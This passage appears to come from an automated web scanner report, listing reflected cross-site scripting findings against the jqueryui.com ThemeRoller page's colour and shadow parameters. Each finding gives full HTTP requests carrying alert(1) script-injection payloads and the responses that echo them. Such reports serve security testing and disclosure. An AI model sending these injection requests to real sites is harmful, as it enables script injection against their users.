GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120068

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&
...[SNIP]...

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc56e"><script>alert(1)</script>b6fd687b91b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_so
...[SNIP]...

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37bd2"><script>alert(1)</script>542322e3a20 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_h
...[SNIP]...

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 121f8"><script>alert(1)</script>339bbf5b28c was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bg
...[SNIP]...

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f680b"><script>alert(1)</script>a08033f67f2 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f99b"><script>alert(1)</script>e7938fcd6a0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.pn
...[SNIP]...

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6309"><script>alert(1)</script>9ad591495d9 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOv
...[SNIP]...

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df23d"><script>alert(1)</script>420d9ca6e8e was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png
...[SNIP]...

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab231"><script>alert(1)</script>a044bec90e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ab231"><script>alert(1)</script>a044bec90e3=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ab231"><script>alert(1)</script>a044bec90e3=1" type="text/css" media="all" />
...[SNIP]...

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b491a"><script>alert(1)</script>6437ba3b123 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c65d"><script>alert(1)</script>1ac0e87e35d was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

